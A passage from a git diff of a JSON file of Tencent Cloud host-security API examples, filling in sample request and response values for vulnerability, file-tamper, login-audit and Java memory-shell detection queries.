"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeDirectConnectInstallCommand\n<公共请求参数>\n\n{\n \"RegionCode\": \"sz\",\n \"VpcId\": \"vpc-dsda\",\n \"ExpireDate\": \"2020-09-22\"\n}",
|
1413
|
+
"output": "{\n \"Response\": {\n \"Ip\": \"10.0.0.11\",\n \"Token\": \"708cae4cf814c3deda4208da228fad4e\",\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
1442
1414
|
"title": "清理主机信息"
|
1443
1415
|
}
|
1444
1416
|
],
|
@@ -1454,7 +1426,7 @@
|
|
1454
1426
|
{
|
1455
1427
|
"document": "专家服务-安全管家列表",
|
1456
1428
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeEmergencyResponseList\n<公共请求参数>\n\n{}",
|
1457
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"TaskId\": \"cve2021-1616989795566545881\",\n \"HostNum\": 1,\n \"Status\": 1,\n \"StartTime\": \"2021-03-29 12:49:55\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"\"\n },\n {\n \"TaskId\": \"cve2021-1617009909259811227\",\n \"HostNum\": 1,\n \"Status\": 0,\n \"StartTime\": \"--\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"\"\n }\n ],\n \"RequestId\": \"48ca3c70-801e-48b1-80a7-1007afbf5ffb\",\n \"TotalCount\": 2\n }\n}",
|
1429
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"TaskId\": \"cve2021-1616989795566545881\",\n \"HostNum\": 1,\n \"Status\": 1,\n \"StartTime\": \"2021-03-29 12:49:55\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"/tmp\"\n },\n {\n \"TaskId\": \"cve2021-1617009909259811227\",\n \"HostNum\": 1,\n \"Status\": 0,\n \"StartTime\": \"--\",\n \"EndTime\": \"--\",\n \"ReportPath\": \"/tmp\"\n }\n ],\n \"RequestId\": \"48ca3c70-801e-48b1-80a7-1007afbf5ffb\",\n \"TotalCount\": 2\n }\n}",
|
1458
1430
|
"title": "专家服务-安全管家列表"
|
1459
1431
|
}
|
1460
1432
|
],
|
@@ -1462,7 +1434,7 @@
|
|
1462
1434
|
{
|
1463
1435
|
"document": "应急漏洞列表",
|
1464
1436
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeEmergencyVulList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
1465
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"VulId\": 105374,\n \"Level\": 4,\n \"VulName\": \"Apache OFBiz SSRF到远程代码执行漏洞(CVE-2024-45507)\",\n \"PublishDate\": \"2024-09-04 00:00:00\",\n \"Category\": 2,\n \"Status\": 2,\n \"LastScanTime\": \"2024-10-21 14:27:07\",\n \"Progress\": 0,\n \"CveId\": \"CVE-2024-45507\",\n \"CvssScore\": 9.8,\n \"Labels\": \"远程利用\",\n \"HostCount\": 0,\n \"IsSupportDefense\": 0,\n \"DefenseAttackCount\": 0,\n \"Method\": 1,\n \"AttackLevel\": 0,\n \"DefenseState\": false\n }\n ],\n \"TotalCount\": 1,\n \"ExistsRisk\": true,\n \"RequestId\": \"
|
1437
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"VulId\": 105374,\n \"Level\": 4,\n \"VulName\": \"Apache OFBiz SSRF到远程代码执行漏洞(CVE-2024-45507)\",\n \"PublishDate\": \"2024-09-04 00:00:00\",\n \"Category\": 2,\n \"Status\": 2,\n \"LastScanTime\": \"2024-10-21 14:27:07\",\n \"Progress\": 0,\n \"CveId\": \"CVE-2024-45507\",\n \"CvssScore\": 9.8,\n \"Labels\": \"远程利用\",\n \"HostCount\": 0,\n \"IsSupportDefense\": 0,\n \"DefenseAttackCount\": 0,\n \"Method\": 1,\n \"AttackLevel\": 0,\n \"DefenseState\": false\n }\n ],\n \"TotalCount\": 1,\n \"ExistsRisk\": true,\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\"\n }\n}",
|
1466
1438
|
"title": "应急漏洞列表"
|
1467
1439
|
}
|
1468
1440
|
],
|
@@ -1470,7 +1442,7 @@
|
|
1470
1442
|
{
|
1471
1443
|
"document": "根据事件表名和id查询告警事件详情",
|
1472
1444
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeEventByTable\n<公共请求参数>\n\n{\n \"TableName\": \"events_bash\",\n \"Ids\": [\n 0\n ]\n}",
|
1473
|
-
"output": "{\n \"Response\": {\n \"Type\": \"bash\",\n \"Value\": \"value\",\n \"RequestId\": \"
|
1445
|
+
"output": "{\n \"Response\": {\n \"Type\": \"bash\",\n \"Value\": \"value\",\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
1474
1446
|
"title": "示例"
|
1475
1447
|
}
|
1476
1448
|
],
|
@@ -1478,7 +1450,7 @@
|
|
1478
1450
|
{
|
1479
1451
|
"document": "专家服务-安全管家列表",
|
1480
1452
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeExpertServiceList\n<公共请求参数>\n\n{}",
|
1481
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 1,\n \"OrderId\": 93,\n \"Quuid\": \"0bd8d80d-b8e9-4096-afa1-f381f6c08ebb\",\n \"Uuid\": \"0bd8d80d-b8e9-4096-afa1-f381f6c08ebb\",\n \"Status\": 1,\n \"StartTime\": \"2021-03-17 15:47:15\",\n \"EndTime\": \"2021-04-17 15:47:15\",\n \"HostName\": \"功能测试v_tximtan\",\n \"HostIp\": \"10.0.0.135\",\n \"RiskCount\": 6\n },\n {\n \"Id\": 10,\n \"OrderId\": 3,\n \"Quuid\": \"d3f439cb-ab47-4834-8fd8-74eb16c83c58\",\n \"Uuid\": \"d3f439cb-ab47-4834-8fd8-74eb16c83c58\",\n \"Status\": 1,\n \"StartTime\": \"2020-08-28 15:40:23\",\n \"EndTime\": \"2021-08-28 15:40:23\",\n \"HostName\": \"
|
1453
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 1,\n \"OrderId\": 93,\n \"Quuid\": \"0bd8d80d-b8e9-4096-afa1-f381f6c08ebb\",\n \"Uuid\": \"0bd8d80d-b8e9-4096-afa1-f381f6c08ebb\",\n \"Status\": 1,\n \"StartTime\": \"2021-03-17 15:47:15\",\n \"EndTime\": \"2021-04-17 15:47:15\",\n \"HostName\": \"功能测试v_tximtan\",\n \"HostIp\": \"10.0.0.135\",\n \"RiskCount\": 6\n },\n {\n \"Id\": 10,\n \"OrderId\": 3,\n \"Quuid\": \"d3f439cb-ab47-4834-8fd8-74eb16c83c58\",\n \"Uuid\": \"d3f439cb-ab47-4834-8fd8-74eb16c83c58\",\n \"Status\": 1,\n \"StartTime\": \"2020-08-28 15:40:23\",\n \"EndTime\": \"2021-08-28 15:40:23\",\n \"HostName\": \"hn***\",\n \"HostIp\": \"10.0.1.92\",\n \"RiskCount\": 0\n }\n ],\n \"RequestId\": \"48ca3c70-801e-48b1-80a7-1007afbf5ffb\",\n \"TotalCount\": 2\n }\n}",
|
1482
1454
|
"title": "专家服务-安全管家列表"
|
1483
1455
|
}
|
1484
1456
|
],
|
@@ -1493,15 +1465,15 @@
|
|
1493
1465
|
"DescribeExportMachines": [
|
1494
1466
|
{
|
1495
1467
|
"document": "本接口 (DescribeExportMachines) 用于导出区域主机列表。",
|
1496
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeExportMachines\n&MachineType=CVM\n&MachineRegion=ap-shanghai\n&Filters.0.Name=Keywords\n&Filters.0.Values.0=10.0.1.1\n&Limit=10\n&Offset=0\n&<公共请求参数>",
|
1497
|
-
"output": "{\n \"Response\": {\n \"TaskId\": \"
|
1468
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeExportMachines\n&MachineType=CVM\n&MachineRegion=ap-shanghai\n&Filters.0.Name=Keywords\n&Filters.0.Values.0=10.0.1.1\n&Limit=10\n&Offset=0\n&<公共请求参数> {}",
|
1469
|
+
"output": "{\n \"Response\": {\n \"TaskId\": \"1\",\n \"RequestId\": \"c30f35cb-2f3e-94f5-59ae-316e0f32e660\"\n }\n}",
|
1498
1470
|
"title": "导出获取区域主机列表"
|
1499
1471
|
}
|
1500
1472
|
],
|
1501
1473
|
"DescribeFastAnalysis": [
|
1502
1474
|
{
|
1503
1475
|
"document": "",
|
1504
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFastAnalysis\n<公共请求参数>\n\n{\n \"To\": \"1657511824000\",\n \"FieldName\": \"cls_event_type\",\n \"From\": \"1657468800000\",\n \"Query\": \"\"\n}",
|
1476
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFastAnalysis\n<公共请求参数>\n\n{\n \"To\": \"1657511824000\",\n \"FieldName\": \"cls_event_type\",\n \"From\": \"1657468800000\",\n \"Query\": \"a=b\"\n}",
|
1505
1477
|
"output": "{\n \"Response\": {\n \"FieldValueRatioInfos\": [\n {\n \"Count\": 56412,\n \"Ratio\": 0.59550929493608,\n \"Value\": \"malware\"\n },\n {\n \"Count\": 27836,\n \"Ratio\": 0.29384876859251,\n \"Value\": \"asset_package\"\n },\n {\n \"Count\": 2291,\n \"Ratio\": 0.024184779740101,\n \"Value\": \"asset_core_module\"\n },\n {\n \"Count\": 1873,\n \"Ratio\": 0.019772192253692,\n \"Value\": \"asset_init_service\"\n },\n {\n \"Count\": 1797,\n \"Ratio\": 0.0189699036198,\n \"Value\": \"asset_env\"\n },\n {\n \"Count\": 1506,\n \"Ratio\": 0.015897982666343,\n \"Value\": \"asset_account\"\n },\n {\n \"Count\": 1375,\n \"Ratio\": 0.014515090415818,\n \"Value\": \"asset_jar\"\n },\n {\n \"Count\": 390,\n \"Ratio\": 0.0041170074633956,\n \"Value\": \"asset_netstat\"\n },\n {\n \"Count\": 351,\n \"Ratio\": 0.003705306717056,\n \"Value\": \"asset_app\"\n },\n {\n \"Count\": 332,\n \"Ratio\": 0.0035047345585829,\n \"Value\": \"asset_scheduled_task\"\n }\n ],\n \"RequestId\": \"6b4fc486-f623-4d19-bbc8-14c2396d7cc3\",\n \"TotalCount\": 10\n }\n}",
|
1506
1478
|
"title": "示例"
|
1507
1479
|
}
|
@@ -1510,7 +1482,7 @@
|
|
1510
1482
|
{
|
1511
1483
|
"document": "",
|
1512
1484
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFileTamperEventRuleInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
1513
|
-
"output": "{\n \"Response\": {\n \"FileTamperRuleDetail\": {\n \"
|
1485
|
+
"output": "{\n \"Response\": {\n \"FileTamperRuleDetail\": {\n \"Id\": 11855,\n \"Uuids\": [\n \"7168bc08-c1b8-11ea-9053-48fd8e5f474c\"\n ],\n \"Name\": \"vim\",\n \"Rule\": [\n {\n \"ProcessPath\": \"*/vim\",\n \"Target\": \"/home/test/*\",\n \"Action\": \"alert\",\n \"FileAction\": \"read;write\"\n }\n ],\n \"IsGlobal\": 0,\n \"Status\": 0,\n \"Level\": 1,\n \"CreateTime\": \"2024-05-29T09:49:10+08:00\",\n \"ModifyTime\": \"2024-06-03T20:14:59+08:00\",\n \"UuidTotalCount\": 1,\n \"AddWhiteType\": \"all\"\n },\n \"RequestId\": \"f4716f03-cca5-4087-afe8-26f361193661\"\n }\n}",
|
1514
1486
|
"title": "示例"
|
1515
1487
|
}
|
1516
1488
|
],
|
@@ -1518,7 +1490,7 @@
|
|
1518
1490
|
{
|
1519
1491
|
"document": "正常获取",
|
1520
1492
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFileTamperEvents\n<公共请求参数>\n\n{\n \"Offset\": 1,\n \"Limit\": 1\n}",
|
1521
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 370572797,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"0.0.0.0\",\n \"HostName\": \"销售许可测试机器\",\n \"Type\": 0,\n \"ProcessExe\": \"/usr/bin/crontab\",\n \"ProcessArgv\": \"crontab /root/cron.tmp\",\n \"Target\": \"/var/spool/cron/#tmp.VM-124-81-tencentos.
|
1493
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 370572797,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"0.0.0.0\",\n \"HostName\": \"销售许可测试机器\",\n \"Type\": 0,\n \"ProcessExe\": \"/usr/bin/crontab\",\n \"ProcessArgv\": \"crontab /root/cron.tmp\",\n \"Target\": \"/var/spool/cron/#tmp.VM-124-81-tencentos.2QUwZR\",\n \"Status\": 0,\n \"EventCount\": 1,\n \"RuleId\": 1,\n \"RuleName\": \"系统策略-篡改计划任务\",\n \"Pstree\": \"[{\\\"pid\\\":980959,\\\"exe\\\":\\\"/usr/bin/crontab\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"crontab /root/cron.tmp\\\",\\\"start_time\\\":1729557954,\\\"type\\\":1},{\\\"pid\\\":2288,\\\"exe\\\":\\\"/root/chaos-executor\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"./chaos-executor d -p 29785a94e8324 -f id_rsa.pub -n Production -s Production\\\",\\\"start_time\\\":1729471587,\\\"type\\\":2}]\",\n \"CreateTime\": \"2024-10-22 08:45:58\",\n \"ModifyTime\": \"2024-10-22 08:45:58\",\n \"Level\": 1,\n \"RuleCategory\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"Description\": \"检测到系统计划任务被修改\",\n \"Suggestion\": \"排查是否为正常业务需要的计划任务修改\",\n \"PrivateIp\": \"10.1.1.15\",\n \"ExePermission\": \"-rwsr-xr-x\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ExeMd5\": \"569f953571579ec4ae613cca7862930a\",\n \"ExeSize\": 0,\n \"ExeTime\": 1669715461,\n \"TargetSize\": 981,\n \"TargetPermission\": \"-rw-------\",\n \"TargetModifyTime\": \"2024-10-22 08:45:54\",\n \"TargetCreatTime\": \"2024-10-22 08:45:54\",\n \"ExePid\": 980959,\n \"TargetName\": \"#tmp.VM-124-81-tencentos.QUwZR\",\n \"Reference\": \"https://\",\n \"ExeName\": \"crontab\",\n \"FileAction\": \"write\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"0.0.0.0\",\n \"PrivateIP\": \"10.1.1.15\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-d7f***\",\n \"InstanceID\": \"ins-dsdsds\",\n \"HostName\": \"hn***\"\n }\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\"\n }\n}",
|
1522
1494
|
"title": "核心文件监控事件列表"
|
1523
1495
|
}
|
1524
1496
|
],
|
@@ -1534,7 +1506,7 @@
|
|
1534
1506
|
{
|
1535
1507
|
"document": "",
|
1536
1508
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFileTamperRuleInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
1537
|
-
"output": "{\n \"Response\": {\n \"FileTamperRuleDetail\": {\n \"Id\":
|
1509
|
+
"output": "{\n \"Response\": {\n \"FileTamperRuleDetail\": {\n \"Id\": 10001,\n \"Uuids\": [\n \"1ce68339-8828-457f-b358-d5b1b34e4fe9\"\n ],\n \"Name\": \"机器名称\",\n \"Rule\": [\n {\n \"ProcessPath\": \"*/vi\",\n \"Target\": \"/root/*\",\n \"Action\": \"alert\",\n \"FileAction\": \"write\"\n }\n ],\n \"IsGlobal\": 0,\n \"Status\": 1,\n \"CreateTime\": \"2024-08-23T14:37:10+08:00\",\n \"ModifyTime\": \"2024-10-10T20:38:26+08:00\",\n \"Level\": 1,\n \"UuidTotalCount\": 1,\n \"AddWhiteType\": \"all\"\n },\n \"RequestId\": \"2725aee8-adc4-4501-90cd-ccd77bfd35d5\"\n }\n}",
|
1538
1510
|
"title": "示例"
|
1539
1511
|
}
|
1540
1512
|
],
|
@@ -1542,7 +1514,7 @@
|
|
1542
1514
|
{
|
1543
1515
|
"document": "",
|
1544
1516
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFileTamperRules\n<公共请求参数>\n\n{\n \"Offset\": 1,\n \"Limit\": 1\n}",
|
1545
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Status\": 1,\n \"Name\": \"核心文件名称1\",\n \"HostCount\": 1,\n \"ModifyTime\": \"2023-01-01 00:00:00\",\n \"CreateTime\": \"2023-01-01 00:00:00\",\n \"RuleCategory\": 1,\n \"Id\": 1,\n \"IsGlobal\": 1,\n \"Level\": 1,\n \"WriteRuleCount\": 1,\n \"ReadRuleCount\": 1,\n \"ReadWriteRuleCount\": 1,\n \"FileAction\": \"\",\n \"AddWhiteType\": \"\"\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
1517
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Status\": 1,\n \"Name\": \"核心文件名称1\",\n \"HostCount\": 1,\n \"ModifyTime\": \"2023-01-01 00:00:00\",\n \"CreateTime\": \"2023-01-01 00:00:00\",\n \"RuleCategory\": 1,\n \"Id\": 1,\n \"IsGlobal\": 1,\n \"Level\": 1,\n \"WriteRuleCount\": 1,\n \"ReadRuleCount\": 1,\n \"ReadWriteRuleCount\": 1,\n \"FileAction\": \"read\",\n \"AddWhiteType\": \"all\"\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
1546
1518
|
"title": "核心文件监控事件列表"
|
1547
1519
|
}
|
1548
1520
|
],
|
@@ -1574,7 +1546,7 @@
|
|
1574
1546
|
{
|
1575
1547
|
"document": "根据主机Quuid数组查询主机信息",
|
1576
1548
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeHostInfo\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n ]\n}",
|
1577
|
-
"output": "{\n \"Response\": {\n \"HostInfoList\": [\n {\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"TagList\": [\n \"
|
1549
|
+
"output": "{\n \"Response\": {\n \"HostInfoList\": [\n {\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"TagList\": [\n \"tag\"\n ],\n \"HostIp\": \"10.0.0.11\",\n \"AliasName\": \"test-name\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"KernelVersion\": \"0.1.1\",\n \"MachineStatus\": \"ONLINE\",\n \"ProtectType\": \"BASIC_VERSION\",\n \"VulNum\": 0,\n \"CloudTags\": [],\n \"InstanceID\": \"ins-aj28fjz\"\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
1578
1550
|
"title": "主机信息与标签信息查询"
|
1579
1551
|
}
|
1580
1552
|
],
|
@@ -1582,7 +1554,7 @@
|
|
1582
1554
|
{
|
1583
1555
|
"document": "登录审计列表",
|
1584
1556
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeHostLoginList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
|
1585
|
-
"output": "{\n \"Response\": {\n \"HostLoginList\": [\n {\n \"Id\": 202008000000022,\n \"Uuid\": \"5cc8e4d2-311f-11ea-922b-98be9421969a\",\n \"MachineIp\": \"10.104.194.49\",\n \"MachineName\": \"v_lwjlin_centos_林\",\n \"UserName\": \"root\",\n \"SrcIp\": \"120.229.227.225\",\n \"Status\": 2,\n \"Country\": 1,\n \"City\": 216,\n \"Province\": 19,\n \"LoginTime\": \"2020-02-20 14:51:35\",\n \"ModifyTime\": \"2020-02-20 14:51:35\",\n \"IsRiskUser\": 0,\n \"Port\": 22,\n \"Location\": \"中国:广东省:深圳市\",\n \"Desc\": \"\",\n \"IsRiskSrcIp\": 1,\n \"IsRiskArea\": 1,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"RiskLevel\": 0,\n \"IsRiskTime\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"InstanceID\": \"ins-12341234\",\n \"NetworkName\": \"
|
1557
|
+
"output": "{\n \"Response\": {\n \"HostLoginList\": [\n {\n \"Id\": 202008000000022,\n \"Uuid\": \"5cc8e4d2-311f-11ea-922b-98be9421969a\",\n \"MachineIp\": \"10.104.194.49\",\n \"MachineName\": \"v_lwjlin_centos_林\",\n \"UserName\": \"root\",\n \"SrcIp\": \"120.229.227.225\",\n \"Status\": 2,\n \"Country\": 1,\n \"City\": 216,\n \"Province\": 19,\n \"LoginTime\": \"2020-02-20 14:51:35\",\n \"ModifyTime\": \"2020-02-20 14:51:35\",\n \"IsRiskUser\": 0,\n \"Port\": 22,\n \"Location\": \"中国:广东省:深圳市\",\n \"Desc\": \"idesc\",\n \"IsRiskSrcIp\": 1,\n \"IsRiskArea\": 1,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"RiskLevel\": 0,\n \"IsRiskTime\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"InstanceID\": \"ins-12341234\",\n \"NetworkName\": \"vpc-d7f***\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"HostName\": \"机器名称\"\n }\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TotalCount\": 1\n }\n}",
|
1586
1558
|
"title": "登录审计列表"
|
1587
1559
|
}
|
1588
1560
|
],
|
@@ -1597,7 +1569,7 @@
|
|
1597
1569
|
"DescribeIgnoreBaselineRule": [
|
1598
1570
|
{
|
1599
1571
|
"document": "查询已经进行忽略操作的检测项信息",
|
1600
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeIgnoreBaselineRule\n&Limit=10\n&Offset=0\n&RuleName=
|
1572
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeIgnoreBaselineRule\n&Limit=10\n&Offset=0\n&RuleName=irule\n&<公共请求参数>",
|
1601
1573
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"TotalCount\": 100,\n \"IgnoreBaselineRuleList\": [\n {\n \"RuleName\": \"检测项1\",\n \"RuleId\": 1,\n \"EffectHostCount\": 20,\n \"ModifyTime\": \"2020-11-11 :00:00:00\",\n \"Fix\": \"重启\"\n },\n {\n \"RuleName\": \"检测项2\",\n \"EffectHostCount\": 25,\n \"RuleId\": 12,\n \"ModifyTime\": \"2020-11-11 :00:00:50\",\n \"Fix\": \"重启2次\"\n }\n ]\n }\n}",
|
1602
1574
|
"title": "查询忽略检测项信息"
|
1603
1575
|
}
|
@@ -1622,7 +1594,7 @@
|
|
1622
1594
|
{
|
1623
1595
|
"document": "",
|
1624
1596
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeImportMachineInfo\n<公共请求参数>\n\n{\n \"MachineList\": [\n \"0.0.0.0\"\n ],\n \"ImportType\": \"Ip\",\n \"IsQueryProMachine\": true\n}",
|
1625
|
-
"output": "{\n \"Response\": {\n \"EffectiveMachineInfoList\": [\n {\n \"MachineName\": \"
|
1597
|
+
"output": "{\n \"Response\": {\n \"EffectiveMachineInfoList\": [\n {\n \"MachineName\": \"tke-np-ol06goby-worker\",\n \"MachinePublicIp\": \"10.0.1.92\",\n \"MachinePrivateIp\": \"172.17.2.23\",\n \"MachineTag\": [\n {\n \"Rid\": 10,\n \"Name\": \"dev\",\n \"TagId\": 10021\n }\n ],\n \"CloudTags\": [\n {\n \"TagKey\": \"cwp\",\n \"TagValue\": \"dev\"\n }\n ],\n \"Quuid\": \"a9fe0359-04d9-417f-ab6d-4941891d6c4b\",\n \"Uuid\": \"a9fe0359-04d9-417f-ab6d-4941891d6c4b\",\n \"KernelVersion\": \"5.4.241-19-0017.1_plus\",\n \"MachineStatus\": \"OFFLINE\",\n \"LicenseOrder\": {\n \"LicenseId\": 136621,\n \"LicenseType\": 2,\n \"SourceType\": 1,\n \"ResourceId\": \"white_883011a2fb7a2ce8f032025ec0437f52\",\n \"Status\": 1\n },\n \"VulNum\": 0,\n \"InstanceID\": \"eks-h847trlg\"\n }\n ],\n \"InvalidMachineList\": [\n \"a9fe0359-04d9-417f-ab6d-****\"\n ],\n \"RequestId\": \"633204c8-383a-4dbb-940b-2e92d0674529\"\n }\n}",
|
1626
1598
|
"title": "查询批量导入机器信息"
|
1627
1599
|
}
|
1628
1600
|
],
|
@@ -1637,8 +1609,8 @@
|
|
1637
1609
|
"DescribeJavaMemShellInfo": [
|
1638
1610
|
{
|
1639
1611
|
"document": "",
|
1640
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellInfo\n<公共请求参数>\n\n{\n \"Id\":
|
1641
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"Info\": {\n \"InstanceName\": \"v_llzlu-PC0\",\n \"InstanceState\": \"RUNNING\",\n \"PrivateIp\": \"192.168.255.10\",\n \"PublicIp\": \"110.40.207.98\",\n \"Type\": 1,\n \"Description\": \"Java (2845)中加载的net...\",\n \"CreateTime\": \"2021-01-20 16:17:11\",\n \"RecentFoundTime\": \"2021-01-20 16:17:11\",\n \"Status\": 0,\n \"ClassLoaderName\": \"org.apache.jasper.servlet.JasperLoader\",\n \"SuperClassName\": \"java.lang.Object\",\n \"Md5\": \"37e54fce63f1ca6c82927caf7aa1c412\",\n \"Interfaces\": \"java.IO.Writer,java.IO.Reader\",\n \"Annotations\": \"注释\",\n \"Pid\":
|
1612
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellInfo\n<公共请求参数>\n\n{\n \"Id\": 184113\n}",
|
1613
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"Info\": {\n \"InstanceName\": \"v_llzlu-PC0\",\n \"InstanceState\": \"RUNNING\",\n \"PrivateIp\": \"192.168.255.10\",\n \"PublicIp\": \"110.40.207.98\",\n \"Type\": 1,\n \"Description\": \"Java (2845)中加载的net...\",\n \"CreateTime\": \"2021-01-20 16:17:11\",\n \"RecentFoundTime\": \"2021-01-20 16:17:11\",\n \"Status\": 0,\n \"MachineState\": \"OFFLINE\",\n \"ClassLoaderName\": \"org.apache.jasper.servlet.JasperLoader\",\n \"SuperClassName\": \"java.lang.Object\",\n \"Md5\": \"37e54fce63f1ca6c82927caf7aa1c412\",\n \"Interfaces\": \"java.IO.Writer,java.IO.Reader\",\n \"Annotations\": \"注释\",\n \"Pid\": 1,\n \"Exe\": \"/usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java\",\n \"Args\": \"org.apache.catalina.startup.Bootstrap start\",\n \"ClassName\": \"main.class\",\n \"ClassContent\": \"avewsa==...\",\n \"ClassContentPretty\": \"package com.company;public class Main public static void main(String[] args) ...\",\n \"EventDescription\": \"腾讯御见...\",\n \"SecurityAdvice\": \"安全建议..\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"43.18.142.28\",\n \"PrivateIP\": \"10.0.1.233\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-d7f***\",\n \"InstanceID\": \"ins-j7vufb6\",\n \"HostName\": \"hn***\"\n }\n }\n }\n}",
|
1642
1614
|
"title": "查询java内存马事件详细信息"
|
1643
1615
|
}
|
1644
1616
|
],
|
@@ -1646,23 +1618,23 @@
|
|
1646
1618
|
{
|
1647
1619
|
"document": "查询java内存马事件列表",
|
1648
1620
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellList\n<公共请求参数>\n\n{\n \"Offset\": 1,\n \"Limit\": 1\n}",
|
1649
|
-
"output": "{\n \"Response\": {\n \"
|
1621
|
+
